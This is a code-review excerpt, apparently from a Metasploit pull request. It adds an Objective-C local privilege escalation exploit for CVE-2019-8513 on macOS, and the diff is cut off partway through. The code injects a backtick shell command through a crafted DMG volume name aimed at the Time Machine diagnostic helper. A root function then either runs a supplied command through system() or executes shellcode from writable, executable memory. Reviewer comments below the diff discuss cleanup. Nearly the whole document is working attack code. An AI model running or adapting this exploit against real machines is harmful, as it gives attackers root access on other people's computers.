external/source/exploits/CVE-2019-8513/exp.m

```diff
@@ -0,0 +1,127 @@
+/*
+  clang -framework Foundation exp.m -o exp && ./exp
+*/
+
+#import <Foundation/Foundation.h>
+#import <xpc/xpc.h>
+
+#include <glob.h>
+#include <semaphore.h>
+
+#include <sys/mman.h>
+
+char root_payload[1024] = "ROOT_PAYLOAD_PLACEHOLDER";
+void root() {
+  NSLog(@"[exploit] I am Groot!");
+
+  if (!strncmp(root_payload, "CMD:", 4)) {
+    system(root_payload + 4);
+  } else {
+    void *ptr = mmap(0, sizeof(root_payload), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+    if (ptr == MAP_FAILED) {
+        return;
+    }
+    memcpy(ptr, root_payload, sizeof(root_payload));
+    int (*sc)() = ptr;
+    sc();
+  }
+}
+
+#define TARGET "/tmp/1"
+#define CMD "t*/1"
+#define VOLUME "disk`" CMD "`\nA"
+
+@protocol DETimeMachineHelperProtocol
+- (void)runDiagnosticWithDestinationDir:(NSURL *)arg1
+                               replyURL:(void (^)(NSURL *))arg2;
+@end
+
+NSPipe *hdiutil(NSArray *args) {
+  NSPipe *pipe = [NSPipe pipe];
+  NSTask *task = [[NSTask alloc] init];
+  [task setStandardOutput:pipe];
+  [task setLaunchPath:@"/usr/bin/hdiutil"];
+  [task setArguments:args];
+  [task launch];
+  [task waitUntilExit];
+  return pipe;
+}
+
+void exploit() {
+  NSString *dir = [NSTemporaryDirectory()
+      stringByAppendingPathComponent:[[NSProcessInfo processInfo]
+                                         globallyUniqueString]];
+  NSString *dmg = [dir stringByAppendingString:@".dmg"];
+  NSFileManager *fileMgr = [NSFileManager defaultManager];
+  NSError *err = NULL;
+  NSString *src = [[NSBundle mainBundle] executablePath];
+  [fileMgr removeItemAtPath:@TARGET error:nil];
+  [fileMgr copyItemAtPath:src toPath:@TARGET error:&err];
+  if (err)
+    NSLog(@"warning, failed to copy: %@", err);
+
+  [fileMgr createDirectoryAtPath:dir
+      withIntermediateDirectories:YES
+                       attributes:nil
+                            error:&err];
+
+  NSLog(@"creating dmg image");
+  hdiutil(@[
+    @"create", @"-fs", @"HFS+", @"-volname", @VOLUME, @"-srcfolder", dir,
+    @"-size", @"840k", @"-format", @"UDRW", dmg
+  ]);
+
+  NSLog(@"mounting malformed disk");
+  NSPipe *pipe = hdiutil(@[ @"attach", dmg ]);
+  NSString *mounted = [[NSString alloc]
```

Comment:
Pass this to the `cleanup` function

Reply:
Thanks! Is there an easy way to pass it to the cleanup function? The cleanup/root is invoked externally and we can't pass any argv.
I'm thinking we either store it (after parsing the result) and do the cleanup from the new session or do something like:
hdiutil info | grep '`'

Reply:
This appears to work: https://github.com/rapid7/metasploit-framework/pull/11726/commits/c428684732d26f8dda715ff51ccf11acbb75be48
Many thanks @ChiChou